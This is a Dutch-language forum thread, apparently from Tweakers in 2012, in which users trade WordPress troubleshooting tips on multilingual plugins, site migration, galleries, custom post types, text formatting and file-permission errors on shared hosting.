Ik ben redelijk nieuw met wordpress maar vroeg met het volgende af: er zijn diverse sites die dingen van hun website beschikbaar stellen via een api. Bestaat er een plugin waarmee ik dit soort streamen op mijn website kan zetten?

Acties:
  • 0 Henk 'm!

• JeroenH
  • Nu online
Nedra schreef op donderdag 19 januari 2012 @ 18:35:
Ik moet zeggen dat ik 't nu wel lastig vind dat qTranslate niet goed met 3.3.x werkt. Ik heb een aantal sites die er van afhankelijk zijn nog maar niet geupdate, maar ik ben eigenlijk op zoek naar een goed alternatief. Iemand goede ervaringen met WPML?
Wat is het probleem dan? Ik heb vorige week geüpgrade naar WP 3.3.1 en QT 2.5.27 en dat werkt voorzover ik nu kan zien prima.

Acties:
  • 0 Henk 'm!

• Vos
  • Registratie: Juni 2000
  • Laatst online: 08:32

Vos

AFCA

Ik heb wel goede ervaringen met WPML, was bij 1e keer even wat uitvogelen...maar uiteindelijk was ik er erg tevreden over. Heb geen ervaringen met QT, dus kan het helaas niet vergelijken.

Acties:
  • 0 Henk 'm!

Verwijderd

Bovendien is WPML een commerciele plugin met officiele support. :)

Acties:
  • 0 Henk 'm!

• Nedra
@jeroenh - ik lees veel problemen met het opslaan van items wanneer het eerste item in je content begint met een html tag - http://wordpress.org/supp...t-from-the-first-language

@Vos - Bedankt voor de info! Ik weet dat WPML vroeger geen pretty permalinks ondersteunde, is dat nu wel 't geval?

Acties:
  • 0 Henk 'm!

• Vos
  • Registratie: Juni 2000
  • Laatst online: 08:32

Vos

AFCA

Permalinks zijn goed tegenwoordig.

Acties:
  • 0 Henk 'm!

• Freezerator
  • Registratie: Januari 2000
  • Laatst online: 14-09 22:44
Maakt iemand gebruik van de iPhone app om te bloggen?

Ik heb nu een blog, maar als ik filmpjes van de iPhone upload zijn ze alleen in Google chrome te zien en niet via IE. Ik ben nu al druk de wordpress fora wezen afstruinen maar een oplossing ben ik nog niet tegengekomen.

Iemand suggesties?

Acties:
  • 0 Henk 'm!

• dread
  • Registratie: Maart 2002
  • Laatst online: 09:07

dread

Sluwe vlaming

advies voor het migreren van een site gevraagd

situatie:
oude site draait nu op hosting van webreus onder een domeinnaam. Probleem is dat het verschikkelijk traag is (8sec voor nieuwe pag aanmaken in wp) en er overdag geen backups gedraaid kunnen worden ivm overbelasting server.

nieuwe situatie:
nieuwe site draait op een nieuwe hosting met de oude domeinnaam

tussentijd:
wordpress site wordt opgebouwd op nieuwe hosting. Als de site klaar is en goedgekeurd wil ik de domeinnaam verhuizen naar de nieuwe hosting.

Wat is de beste manier om dit te doen en kan het uberhaupt wel? Ik dacht zelf de backupbuddy software aan te schaffen omdat die kan migreren (ik wil die ook voor andere sites als backup en migratie inzetten).

Heeft iemand hier ervaring mee?

Don't argue with fools, they will bring you down to their level and beat you with experience.

Acties:
  • 0 Henk 'm!

• TheNephilim

TheNephilim

Wtfuzzle

Ikzelf zet de website altijd klaar in een testomgeving op onze eigen servers. Daar kan de klant gewoon bij, de website word dan helemaal gemaakt en de klant zet de content erop. Als dan alles helemaal spik en span is, maar ik een export in Wordpress, installeer ik Wordpress op het eigenlijke domein/hosting en dan de export terug zetten.

Het licht aan de downtime, hoe groot is het probleem als de website even niet beschikbaar is. Gezien je huidige situatie zou het niet uit moeten maken. Gewoon alles regelen op nieuwe host, dan export vanuit oude maken en die terug zetten.

Maar als het een hele grote website is, weet ik niet of dit goed gaat. Dan zou je inderdaad gewoon de DB kunnen backuppen.

Acties:
  • 0 Henk 'm!

Verwijderd

Ik gebruik altijd Backupbuddy of een andere manier om de DB in zijn geheel over te zetten. Alleen dan weet je namelijk zeker dat de nieuwe site precies hetzelfde is als de oude, inclusief settings en alles.

Acties:
  • 0 Henk 'm!

Verwijderd

Mijn Wordpress Multi Site begint ook langzaam vorm te krijgen. Zit eigenlijk nog maar met 1 ding: foto's.

Ik ben een blog aan het bouwen waar ik regelmatig een foto album in wil creëren, deze wil ik dan includen in een post en een overzichtspagina maken waarop alle albums staan. Nu ben ik al bekend met NextGen maar daar moet je perse al je Galleries in een Album hangen en dan kan je het Album op een Page laten weergeven. Beetje omslachtig, 1x vergeten de Gallery in een Album te hangen en je mist een stuk.

Ook mis ik de NextGen templates om een of andere reden, waardoor de foto omlijsting op zijn zachts gezegd lelijk is. Maar kan ook nergens de benodigde gallery-sample5.php (of 4 of 3 etc.) vinden. Eigenaardig :(

Iemand met ervaring of eventueel een andere plugin?

Acties:
  • 0 Henk 'm!

• Nedra
Ik zou die structuur gewoon zelf maken! Je zou bijvoorbeeld de standaard post-types in kunnen schakelen (aside, gallery,etc). Wanneer je een post met een foto-album erin aanmaakt, vink dan ook 'gallery' aan. Zorg dat je een pagina maakt waar alle gallery posts worden gequeried en je hebt je eigen gallery. Zo kan je ook gebruik maken van een gallery / slideshow plugin naar voorkeur. Ik ben zelf groot fan van portfolio slideshow (pro)

Acties:
  • 0 Henk 'm!

Verwijderd

Thx voor je advies! Ik ga is ff op jacht :)

Acties:
  • 0 Henk 'm!

Verwijderd

ik zit met een probleem wat de widgets betreft. Ik voeg via de admin een widget toe, pas de titel aan, opslaan en geen widget te zien op de frontpage. Refresh ik de admin dan is die hele widget weg.

het vreemde is dat ik al wel widgets heb kunnen toevoegen. Ik haalde 1 widget weg en nu werkt niets meer

Het gaat om www.weerstationmedemblik.nl

Acties:
  • 0 Henk 'm!

Verwijderd

Vos schreef op zaterdag 21 januari 2012 @ 13:12:
Permalinks zijn goed tegenwoordig.
En vooral voor de SEO :)

Acties:
  • 0 Henk 'm!

• Zaratrass
  • Registratie: Oktober 2007
  • Laatst online: 08-09 12:12
ik gebruik NextGEN Gallery Overview... handig programma..

nu zoek ik er iets bij waarbij ik kan inzoomen bij een foto.

ik heb foto's met tekst die niet leesbaar zijn,,, ken iemand hier een plugin voor of een andere oplossing?

Acties:
  • 0 Henk 'm!

• iApp
  • Registratie: Februari 2011
  • Niet online

iApp

Say cheese

Hallo,
Ik heb een vraagje over mijn Wordpress website.

Ik heb een Wordpress website overgezet van mijn oude naar mijn nieuwe domein.
Alles is prima verlopen, op één ding na.

Als ik een bestand upload, plugin toevoeg of update, krijg ik deze error.

Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(/home/username/domains/domein.com/public_html/website/wp-content/uploads//foto-1.tmp) is not within the allowed path(s): (/home/username/:/tmp:/var/tmp:/usr/local/lib/php/) in /home/username/domains/domein.nl/public_html/website/wp-includes/functions.php on line 2340

Warning: touch() [function.touch]: open_basedir restriction in effect. File(/home/gamer/domains/domein.com/public_html/website/wp-content/uploads/foto-1.tmp) is not within the allowed path(s): (/home/username/:/tmp:/var/tmp:/usr/local/lib/php/) in /home/username/domains/domein.nl/public_html/website/wp-admin/includes/file.php on line 177

Kan iemand mij helpen?
Via Google vind ik niks. :(

An  a day keeps the doctor away.

Acties:
  • 0 Henk 'm!

• RobIII
  • Registratie: December 2001
  • Niet online

RobIII

Admin Devschuur®

^ Romeinse Ⅲ ja!

(overleden)
Onzin. [google="open_basedir restriction in effect"]

There are only two hard problems in distributed systems: 2. Exactly-once delivery 1. Guaranteed order of messages 2. Exactly-once delivery.

Je eigen tweaker.me redirect

Over mij

Acties:
  • 0 Henk 'm!

• iApp
  • Niet online

iApp

Say cheese

Het gaat over het volgende probleem:
Warning: touch() [function.touch]: open_basedir restriction in effect. File(/home/gamer/domains/domein.com/public_html/website/wp-content/uploads/foto-1.tmp) (Oude domein) is not within the allowed path(s): (/home/username/:/tmp:/var/tmp:/usr/local/lib/php/) in /home/username/domains/domein.nl/public_html/website/wp-admin/includes/file.php (Nieuwe domein) on line 177

Het probleem is dus dat hij de files nog wil opslaan op het oude domein, wat dus niet kan.
Ik weet ook niet waar ik dit kan veranderen, aangezien ik bij instellingen --> Algemeen de website URL al veranderd heb, en bij Instellingen --> Media ''Uploads opslaan in map'' staat hij nog op standaard: wp-content/uploads

Dus ik weet niet waar ik verder kan kijken om het adres te wijzigen.
En dit vond ik niet op Google. ;)

Acties:
  • 0 Henk 'm!

• RobIII
  • Registratie: December 2001
  • Niet online

RobIII

Admin Devschuur®

^ Romeinse Ⅲ ja!

(overleden)
Doe eens gek en loop eens door je DB heen met PHPMyAdmin ofzo op zoek naar een settings tabelletje? Of kijk eens in een-of-andere config.php of weet-ik-wat wordpress gebruikt. Doe desnoods een textsearch op de directory van je wordpress installatie op zoek naar de oude domeinnaam. Er is nog zat wat je kunt proberen voordat je überhaupt nog naar google moet gaan. En dan zou ik niet eens naar Google gaan maar 't eens proberen in de Wordpress documentatie en anders bij hun support afdeling (waar ik overigens ook zat vond).

In de volgende post van je zou ik graag lezen wat je allemaal hebt geprobeerd. Want dat is tot op heden zo goed als niets en je weet donders goed dat we daar allergisch voor zijn hier ;) En daarbij: lees de topicwaarschuwing eens; in dat rode kader met die dikke blauwe letters; je gaat feitelijk nu al over de lijn van wat wenselijk is in dit topic.

[ Voor 39% gewijzigd door RobIII op 06-02-2012 23:52 ]

There are only two hard problems in distributed systems: 2. Exactly-once delivery 1. Guaranteed order of messages 2. Exactly-once delivery.

Je eigen tweaker.me redirect

Over mij

Acties:
  • 0 Henk 'm!

• iApp
  • Niet online

iApp

Say cheese

Is het dan geen mooi idee om een Hulp Wordpress topic aan te maken op Tweakers?
Ik denk dat vele Tweakers wel vaak vragen hebben over Wordpress. ;)
-Maar dat niet durven te vragen omdat ze bang zijn om beledigd te worden of gebanned*

Het probleem is nog niet opgelost na het lezen van je links,
Maar voor als nog bedankt daarvoor!

Ik zal nog even rondzoeken,
Als het gelukt is laat ik het nog even weten. *Mits dat hier wel mag

[ Voor 12% gewijzigd door iApp op 07-02-2012 14:31 ]

Acties:
  • 0 Henk 'm!

• joppe113
Goed idee!

Acties:
  • 0 Henk 'm!

• StephanVierkant
  • Registratie: Mei 2003
  • Laatst online: 08-09 16:22
Ik ben erg gecharmeerd van Wordpress, maar ik vind het aanpassen van thema's en plugins nog altijd erg lastig. De documentatie van PHP.net doorzoek ik erg vaak (Ctrl+F2 in Notepad++) maar de documentatie van Wordpress gek genoeg niet. Met welke software werken jullie? Zijn er wellicht IDE's die prima werken met Wordpress die ik moet proberen?

Acties:
  • 0 Henk 'm!

• iApp
  • Niet online

iApp

Say cheese

Slecht idee volgens de mods... ;)
In plaats daarvan mag je een topic openen als je een desbetreffend probleem ondervindt met Wordpress.
Iets dat mij nog niet duidelijk was. De eerste 10.000 topic's zijn in aantocht heren! >:)

Acties:
  • 0 Henk 'm!

• kwaakvaak_v2
Stephan4kant schreef op maandag 13 februari 2012 @ 20:56:
Ik ben erg gecharmeerd van Wordpress, maar ik vind het aanpassen van thema's en plugins nog altijd erg lastig. De documentatie van PHP.net doorzoek ik erg vaak (Ctrl+F2 in Notepad++) maar de documentatie van Wordpress gek genoeg niet. Met welke software werken jullie? Zijn er wellicht IDE's die prima werken met Wordpress die ik moet proberen?
Elke fatsoenlijke php IDE (phpstorm, netbeans, eclipse etc etc) kan prima met wordpress werken, maar als je verwacht dat de documentatie van wordpress daar spontaan in staat moet ik je helaas teleurstellen.

Acties:
  • 0 Henk 'm!

Verwijderd

HardCoreGamer schreef op maandag 13 februari 2012 @ 21:29:
[...]

In plaats daarvan mag je een topic openen als je een desbetreffend probleem ondervindt met Wordpress.
Iets dat mij nog niet duidelijk was. De eerste 10.000 topic's zijn in aantocht heren! >:)
Zou eerlijk gezegd niet echt weten waarom het een slecht idee is, zo voorkom je ook een
wildgroei aan problemen,kun je het makkelijk terugzoeken en kijken veel 'meer mensen'
naar je probleem maar goed, wie ben ik :+. Tenzij ze mods teveel hebben :).

Acties:
  • 0 Henk 'm!

• TheNephilim

TheNephilim

Wtfuzzle

Stephan4kant schreef op maandag 13 februari 2012 @ 20:56:
Het aanpassen van bestaande Themes en Plugins valt inderdaad niet altijd mee. Sommigen zijn complex of zo onduidelijk geschreven dat je er beter zelf 1 kan maken.

Ik werk gewoon in Netbeans (http://netbeans.org/) en dat bevalt prima, ook als je werkt aan een project in Wordpress. Er is zelfs een handleiding over hoe je Wordpress in Netbeans als project gebruikt en dergelijke: http://wiki.netbeans.org/...tBeansProjectForWordPress

Acties:
  • 0 Henk 'm!

• iApp
  • Niet online

iApp

Say cheese

Verwijderd schreef op dinsdag 14 februari 2012 @ 08:40:
[...]

Zou eerlijk gezegd niet echt weten waarom het een slecht idee is, zo voorkom je ook een
wildgroei aan problemen,kun je het makkelijk terugzoeken en kijken veel 'meer mensen'
naar je probleem maar goed, wie ben ik :+. Tenzij ze mods teveel hebben :).
Modbreak:Jij hebt volgens mij geen toestemming gevraagd om zomaar DMs te copypasten

Daarom dus... ;)

[ Voor 49% gewijzigd door MueR op 14-02-2012 23:05 ]

Acties:
  • 0 Henk 'm!

Verwijderd

Ah, duidelijk ;). Had het tegenovergestelde in mijn hoofd O-).

Acties:
  • 0 Henk 'm!

• iApp
  • Niet online

iApp

Say cheese

@Ratje,
Ik denk dat de meeste Tweakers het tegenovergestelde in hun hoofd hebben.
Maar de democratie van fora's zijn in de 21ste eeuw nog ver te zoeken. Of zal een Poll de mods overtuigen??

Acties:
  • 0 Henk 'm!

• kwaakvaak_v2
forums zijn nooit een democratie., gaan ze ook nooit worden ook met de hoeveelheid mensen die ze tevreden moeten houden. Er moeten altijd afwegingen gemaakt worden, en uiteindelijk neemt een klein groepje mensen de eind verantwoording en beslissingen. Waarbij dat groepje mensen echt wel weet dst ze nooit iedereen tevreden kunnen houden.

Maar goed, wie houd je tegen om niet je eigen wordpress helpdesk forum te beginnen? Heb ik bijna 9 jaar terug ook gedaan toen ik het niet eens was met de manier waarop tweakers met een bepaald onderwerp toendertijd in gadget omging. En mag toch stellen dat dit tot een redelijk succesvol besluit is geweest met 100k+ berichten en gemiddeld 13k pageviews per dag ;)

Acties:
  • 0 Henk 'm!

• iApp
  • Niet online

iApp

Say cheese

@Kwaakvaak, dat is leuk als je het met meerdere mensen kan doen!
Zo alleen beginnen, met VBulletin 4 ofzo... Ik denk niet dat dat snel een succes wordt...
En 9 jaar terug waren er nog niet zoveel fora's... ;)

Acties:
  • 0 Henk 'm!

• iApp
  • Niet online

iApp

Say cheese

HardCoreGamer schreef op dinsdag 14 februari 2012 @ 13:15:
[...]

[modbreak]Jij hebt volgens mij geen toestemming gevraagd om zomaar DMs te copypasten[/]
Daarom dus... ;)
@Modbreak,
Dit is alleen maar goed bedoeld. ;)

Maar voor de Tweakers die het heeft gemist: er wordt dus geen Helpdesk topic aangemaakt.
Ze zijn intern al bezig met een betere oplossing.

Acties:
  • 0 Henk 'm!

• TheNephilim

TheNephilim

Wtfuzzle

Ik heb eerder al eens een topic geopend over een dergelijke helpdesk: [IDEE] GoTOverflow, tweakers.net variant op stackoverflow

Mijn insteek was het belonen van de mensen die helpen en daarvoor karma te geven of iets wat er op lijkt.

Acties:
  • 0 Henk 'm!

• NMe
  • Registratie: Februari 2004
  • Laatst online: 09-09 13:58

NMe

Quia Ego Sic Dico.

HardCoreGamer schreef op dinsdag 14 februari 2012 @ 17:03:
Maar de democratie van fora's zijn in de 21ste eeuw nog ver te zoeken. Of zal een Poll de mods overtuigen??
Je kan je wellicht voorstellen dat je na zo'n opmerking helemaal niet meer serieus genomen wordt? ;)

'E's fighting in there!' he stuttered, grabbing the captain's arm.
'All by himself?' said the captain.
'No, with everyone!' shouted Nobby, hopping from one foot to the other.

Acties:
  • 0 Henk 'm!

• iApp
  • Niet online

iApp

Say cheese

NMe schreef op woensdag 15 februari 2012 @ 12:41:
[...]

Je kan je wellicht voorstellen dat je na zo'n opmerking helemaal niet meer serieus genomen wordt? ;)
Als ik serieus genomen zou worden had het nog geen zin... ;)

[ Voor 11% gewijzigd door iApp op 15-02-2012 13:30 ]

Acties:
  • 0 Henk 'm!

• kwaakvaak_v2
HardCoreGamer schreef op dinsdag 14 februari 2012 @ 22:41:
@Kwaakvaak, dat is leuk als je het met meerdere mensen kan doen!
Zo alleen beginnen, met VBulletin 4 ofzo... Ik denk niet dat dat snel een succes wordt...
En 9 jaar terug waren er nog niet zoveel fora's... ;)
met die instelling kom je idd nergens.

Acties:
  • 0 Henk 'm!

• DJH
  • Registratie: Oktober 2000
  • Laatst online: 13-07 00:54

DJH

Laat maar, was iets te voorbarig :)

[ Voor 163% gewijzigd door DJH op 19-02-2012 16:15 ]

Acties:
  • 0 Henk 'm!

• Vincitore
  • Registratie: September 2006
  • Laatst online: 05-08-2021
Op aanraden van sommige mensen uit mijn omgeving ben ik gaan kijken naar Wordpress. En moet zeggen dat het er allemaal erg fijn uit ziet :)

Ik ben van plan een site op te richten, maar weet niet zeker of Wordpress hetzelfde voor ogen heeft met mijn idee (vast wel).
Mijn plan is om een pagina te creëren waarbij ik een soort van overzichtspagina heb met bedrijven (die doorlinkt naar hun eigen detailpagina). Een voorbeeld: http://www.kliniekervaringen.nl/klinieken/

Wanneer dit niet mogelijk is, dan kan ik altijd nog een zoekformulier op de pagina zetten waarbij hij dan door de bedrijven heen zoekt op provincie/stad bijv.

Bedankt!

Stats

Acties:
  • 0 Henk 'm!

• TheNephilim

TheNephilim

Wtfuzzle

Dat kan wel, gewoon een custum post type maken (register_post_type). Verder is alles te vinden op http://codex.wordpress.org/, meestal zoek ik gewoon in google en kom je dar vanzelf terecht.

Acties:
  • 0 Henk 'm!

• Vincitore
Oke, bedankt voor de snelle reactie.

Ik had al gekeken op de Codex maar wist niet goed met welk woord ik moest zoeken. Ik ga hiermee aan de slag :)

Stats

Acties:
  • 0 Henk 'm!

• TheNephilim

TheNephilim

Wtfuzzle

Je kunt met die custom post types heel veel. Je hebt in Wordpress een aantal vaste (bijv.); pages, posts, attachements etc. Je kunt custom post types maken, en daar ook weer extra velden aan knopen en dergelijke. Ik moet zeggen dat het best wel veel uitzoek werk is. Iets werkend krijgen en 'netjes' werkend krijgen in Wordpress zijn heel verschillende dingen.

Zelf zit ik nu met het volgende probleem; klant heeft een plattegrond, heb hier een aantal klikbare vakken overheen gelegd en daar moeten dan foto's in te zien zijn van de aangeklikte zaal. Maar hoe maak ik de foto's netjes aanpasbaar terwijl de vakken vast zijn.
Custom post type met 1 bericht per zaal en de attachments laten zien die daarbij horen?

Acties:
  • 0 Henk 'm!

• dread

dread

Sluwe vlaming

Ik heb echt fhet probleem dat als ik tekst neerzet op een pagina alles achter elkaar gezet wordt. Met de WYSIWYG editor kan je eigenlijk niets instellen.

Ik gebruik het theme prestige.

Ik gebruik nu de <br> en <p> html codes om teksten goed neer te zetten maar dat is veel werk. Ze verdwijnen ook nog eens tenzij je TinyMCE Advanced gebruikt.

Ik heb nu deze code gebruikt:
HTML:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
<p>Een persoonlijke afspraak is mogelijk zodat Manna Leasa je goed kan bijstaan in het designen van jouw ideale unieke schoenen.</p>

<p>[dcs_img width="200" height="133" thumb="true" framed="black"
author="Voor de hele collectie ballerina's, klik op de foto"
lightbox="false" title="The Venetian Dream - il gelato"
url="http://mannaleasa.nl/ballerinas/"
pos="left" mright="18" group="ex9"]
http://mannaleasa.nl/wp-content/uploads/2012/02/ballerina.jpg
[/dcs_img]

[dcs_img width="200" height="133" thumb="true" framed="black"
author="Voor de hele collectie pumps, klik op de foto"
lightbox="false" title="Sweet Little Treats"
url="http://mannaleasa.nl/pumps"
pos="left" mright="18" group="ex9"]
http://mannaleasa.nl/wp-content/uploads/2012/02/pump.jpg
[/dcs_img]

[dcs_img width="200" height="133" thumb="true" framed="black"
author="Voor de hele collectie laarsjes, klik op de foto"
lightbox="false" title="Earlier = Easier"
url="http://mannaleasa.nl/lage-laarsjes/"
pos="left" group="ex9"]
http://mannaleasa.nl/wp-content/uploads/2012/02/laarsje22.jpg
[/dcs_img]</p>

<br>Prijsindicatie:</br>
<p>De prijs van de schoenen is afhankelijk van het ontwerp, deze varieert van €160,00 tot €350,00. Alle prijzen zijn weergegeven in euro&#8217;s (€), inclusief 19% BTW en exclusief eenmalig €15 verzendkosten.</p>
<br>Levertijd:</br>
Iedere schoen van Manna Leasa is handgemaakt. De levertijd duurt ongeveer 5 - 6 weken.

Seriously, een tabel voor een stuk code? :P Je kan ook [code=html|js|css|etc] gebruiken ;)

Maar dit resultaat blijft:
-snip-
sorry, de URI zo neerplempen is niet helemaal de bedoeling.

Ik heb het nu opgelost met een box onder te zetten. Het werkt maar was niet de bedoeling

waarom is het simpel neerzetten van tekst so moeilijk in wordpress?

[ Voor 12% gewijzigd door BtM909 op 27-02-2012 09:11 ]

Don't argue with fools, they will bring you down to their level and beat you with experience.

Acties:
  • 0 Henk 'm!

• Joopieboy
  • Laatst online: 29-12-2020

Joopieboy

No smoke, no poke

Ik denk toch dat het te maken heeft met jouw broncode van de site, en met name de opmaak van de tekst.
Ik gebruik ook altijd die wysiwyg editor en ik heb er totaal geen problemen mee...

Het leven is te kort om geduld te hebben!

Acties:
  • 0 Henk 'm!

Verwijderd

dread schreef op zondag 26 februari 2012 @ 09:39:
Ik heb echt fhet probleem dat als ik tekst neerzet op een pagina alles achter elkaar gezet wordt. Met de WYSIWYG editor kan je eigenlijk niets instellen.

Ik gebruik het theme prestige.

Ik gebruik nu de <br> en <p> html codes om teksten goed neer te zetten maar dat is veel werk. Ze verdwijnen ook nog eens tenzij je TinyMCE Advanced gebruikt.

*knip*

Maar dit resultaat blijft:
*knip*

Ik heb het nu opgelost met een box onder te zetten. Het werkt maar was niet de bedoeling

waarom is het simpel neerzetten van tekst so moeilijk in wordpress?
Ik vraag me gelijk af of dat theme wel 'standaard' styling heeft voor headers, paragraphs, enzovoort?

[ Voor 2% gewijzigd door BtM909 op 27-02-2012 09:11 ]

Acties:
  • 0 Henk 'm!

• dread

dread

Sluwe vlaming

Verwijderd schreef op zondag 26 februari 2012 @ 17:43:
[...]

Ik vraag me gelijk af of dat theme wel 'standaard' styling heeft voor headers, paragraphs, enzovoort?
Het is echt een van de best verkochte themes die verkocht worden op themeforest.

Ik werk met meerdere themes en het is vaak huilen met de pet op om je tekst mooi te krijgen.

Maar een ander probleem. (geen idee waarom alles samenkomt in het afgelopen weekend)

Bezig met een site voor een vriendin:
In de root heb ik verschillende mappen met daarin wordpress sites staan.
Daarin heb ik een map 'test' staan waar ik een voorlopige wordpress site heb staan voor een klant. Site is bijna opgeleverd. Vanalles aan gedaan en dan een week niets gedaan. Vandaag wil ik een foto toevoegen aan de website en met verbazing zit ik dat er geweigerd wordt om de foto te uploaden. Ook het upgraden van plugins werkt niet.

foutmelding wordpress:
Uploaden van "qrcall2.png" is niet gelukt als gevolg van een fout
Het geüploade bestand kan niet verplaatst worden naar /home/deb44546n2/domains/qr2visual.nl/public_html/test/wp-content/uploads/2012/02.

Raar want ik heb niets veranderd.

Dus ik probeer via ftp de foto te uploaden via ftp. gaat ook niet.
Ga ik kijken naar de rechten. Deze staan goed op 755

Wil ik de rechten van de fotofolder op 777 zetten krijg ik een : 550 CHMOD 777 01: Operation not permitted

ben ik aan het ftp'en op de server verlies ik opeens verbinding :
Verbinding verloren
Fout: Ontvangen van mappenlijst is mislukt

[ Voor 61% gewijzigd door dread op 27-02-2012 08:53 ]

Acties:
  • 0 Henk 'm!

• Coach4All
  • Nu online

Coach4All

I'm a Coach 4 All

dread schreef op maandag 27 februari 2012 @ 08:49:
[...]

Wil ik de rechten van de fotofolder op 777 zetten krijg ik een : 550 CHMOD 777 01: Operation not permitted

ben ik aan het ftp'en op de server verlies ik opeens verbinding :
Verbinding verloren
Fout: Ontvangen van mappenlijst is mislukt
Zit je nu toevallig achter een proxy die nog net wel connecten over ftp toelaat, maar de rest afkapt?
Been there, done that.... na een half uur gek worden 3G dongle tevoorschijn gehaald en alles werkte plots... |:(

--- Systeembeheerdersdag --- Voedselintolerantie ---

Acties:
  • 0 Henk 'm!

• dread

dread

Sluwe vlaming

Coach4All schreef op maandag 27 februari 2012 @ 08:56:
[...]

Zit je nu toevallig achter een proxy die nog net wel connecten over ftp toelaat, maar de rest afkapt?
Been there, done that.... na een half uur gek worden 3G dongle tevoorschijn gehaald en alles werkte plots... |:(
Haha dat had ik al via de android gedaan en daar had hij nog steeds hetzelfde probleem.

Dit is het antwoord van de hoster:
De problemen met de bestandsrechten treden op doordat veel bestanden en mappen van de owner 'apache' zijn. Als je inlogt op DirectAdmin of FTP, dan ben je echter de gebruiker 'deb44546n2' en heb je minder rechten op deze bestanden.

Je kunt het beste een 'Reset Ownership' uitvoeren op de volledige map 'test'. Log hiervoor in op DirectAdmin en ga onder User Level boven in beeld naar 'Files'.

Klik vervolgens op de map 'public_html' en selecteer het vinkje rechts naast de map 'test'. Scroll nu naar beneden en selecteer in de blauwe balk het vinkje bij 'Recursive'. Klik tenslotte op 'Reset Owner'.

Kan dat zomaar opeens veranderen dan?

Acties:
  • 0 Henk 'm!

• Freeaqingme
  • Registratie: April 2006
  • Laatst online: 13-09 18:54
Ze draaien apache met user apache? Da's handig. Dan kan jij met een php bestandje van jou bij de bestanden komen van de mensen die nog meer op die server hosten. Nog erger, vice versa geldt hetzelfde

No trees were harmed in creating this message. However, a large number of electrons were terribly inconvenienced.

Acties:
  • 0 Henk 'm!

• dread

dread

Sluwe vlaming

Freeaqingme schreef op maandag 27 februari 2012 @ 18:08:
Ze draaien apache met user apache? Da's handig. Dan kan jij met een php bestandje van jou bij de bestanden komen van de mensen die nog meer op die server hosten. Nog erger, vice versa geldt hetzelfde
Ben je hier zeker van? De hoster is een van de grootste van Nederlands en de best beoordeelde..

Acties:
  • 0 Henk 'm!

• Vincitore
TheNephilim schreef op vrijdag 24 februari 2012 @ 10:13:
Dat kan wel, gewoon een custum post type maken (register_post_type). Verder is alles te vinden op http://codex.wordpress.org/, meestal zoek ik gewoon in google en kom je dar vanzelf terecht.
Heb dit geprobeerd maar het wordt helaas niet zoals ik wil :( Ik heb de video tutorial gevolgd van Custom Post Type UI plugin. Het wordt dan gewoon een titel waaronder staat dat het gecreeerd is bij "Admin" op 28-2-2012 op 22.10 uur.

Ik gebruik nu MCE-table-buttons plugin, dat werkt wel iets beter maar het neemt zo erg veel ruimte in.
Voorbeeld op http://test.vhdigitaal.nl/praktijken/

Stats

Acties:
  • 0 Henk 'm!

• woutertje
  • Laatst online: 13-09 19:53
Freeaqingme schreef op maandag 27 februari 2012 @ 18:08:
Dit is niet waar. Het gaat om de gebruiker waar PHP onder gedraaid wordt. Als een webhoster voor elke klant een apart Apache proces moest draaien zou het voor de server een stuk onaangenamer worden.

Acties:
  • 0 Henk 'm!

• dread

dread

Sluwe vlaming

woutertje schreef op woensdag 29 februari 2012 @ 00:44:
[...]

Dit is niet waar. Het gaat om de gebruiker waar PHP onder gedraaid wordt. Als een webhoster voor elke klant een apart Apache proces moest draaien zou het voor de server een stuk onaangenamer worden.
Dank wouter voor deze toevoeging.

Maar hoe kunnen deze problemen zo plots opkomen dan? en zitten er geen gevaren aan een reset ownership zoals voorgesteld door de hoster?

Edit een paar dagen later.

Deze foutcode treedt op bij een andere site gehost bij dezelfde provider:
WP site volledig geupdate.
Ik krijg de foutcode bij het uploaden van een jpg via WP. Een paar uur tevoren nog een andere jpg geupload en geen problemen toen.
Hij probeert een foto weg te schrijven in 2011/05 ??

Warning: copy(/home/dgebruikersnaam/domains/website/public_html/wp-content/uploads/2011/05/twitter.jpg) [function.copy]: failed to open stream: Permission denied in /home/deb44546/domains/clouddog.eu/public_html/wp-admin/includes/file.php on line 348

Ik heb de jpg via ftp geupload in de map
wp-content/uploads/2012/03/twitter.jpg
Komt hij in de media bibliotheek onder de folder
wp-content/uploads/2011/05/twitter.jpg
te staan en ziet WP dus geen jpg

Wat is er aan de hand?

Edit:
Probleem van de reset ownership zijn dus niet opgelost door het ownership te resetten.

Bovenstaand probleem is opgeost. Niets gedaan en vandaag werkte alles weer alsof er nooit iets gebeurd was.

Dan moet dat toch aan de hoster liggen??

[ Voor 53% gewijzigd door dread op 02-03-2012 16:23 ]

Acties:
  • 0 Henk 'm!

• dread

dread

Sluwe vlaming

Ik probeer het nogmaals want ik wordt een beetje wanhopig.

In de root heb ik verschillende mappen met daarin wordpress sites staan.
Daarin heb ik een map 'test' staan waar ik een voorlopige wordpress site heb staan voor een klant. Site is bijna opgeleverd. Vanalles aan gedaan en dan een week niets gedaan. Vandaag wil ik een foto toevoegen aan de website en met verbazing zit ik dat er geweigerd wordt om de foto te uploaden. Ook het upgraden van plugins werkt niet.

foutmelding wordpress:
Uploaden van "qrcall2.png" is niet gelukt als gevolg van een fout
Het geüploade bestand kan niet verplaatst worden naar /home/deb44546n2/domains/qr2visual.nl/public_html/test/wp-content/uploads/2012/02.

Na overleg met de hoster gaf deze aan om het ownership te restten van de hele folder test. Dat heb ik gedaan en nu kan ik bestanden naar die folder fpt'en

echter kan ik nog steeds geen bestanden via WP uploaden of plugins installeren.

Er blijven rechtenproblemen. Zelf een backup met backup buddy en de site migreren zit er niet in.

foutmeldingen:
> > Uploaden van "contactpage.png" is niet gelukt als gevolg van een fout
> > Het geüploade bestand kan niet verplaatst worden naar
> > /home/gebruikersnaam/domains/
> > website/public_html/test/wp-content/uploads/2012/03.

> Downloaden update van
> > http://downloads.wordpres...contact-form-7.3.1.1.zip…
> > Download mislukt. De doel map voor het streamen van bestanden bestaat niet
> > of is niet schrijfbaar.

Wat me verontrust is dat het probleem opeens ontstaan is. Ik heb echt weken niet aan die site gedaan en opeens was het probleem daar.

Edit:Was ik vergeten. thx het ratje: De rechten waren inmiddels goed gezet naar 777 op de map waar de jpg bestanden moeten komen (755 zou ook al goed moeten zijn) Dit heeft de problemen NIET opgelost.

[ Voor 4% gewijzigd door dread op 05-03-2012 14:20 ]

Acties:
  • 0 Henk 'm!

Verwijderd

Heb je webmin draaien? Dat heb ik, kan ik via de filemanager ook heel handig de
rechten inzien en veranderen.

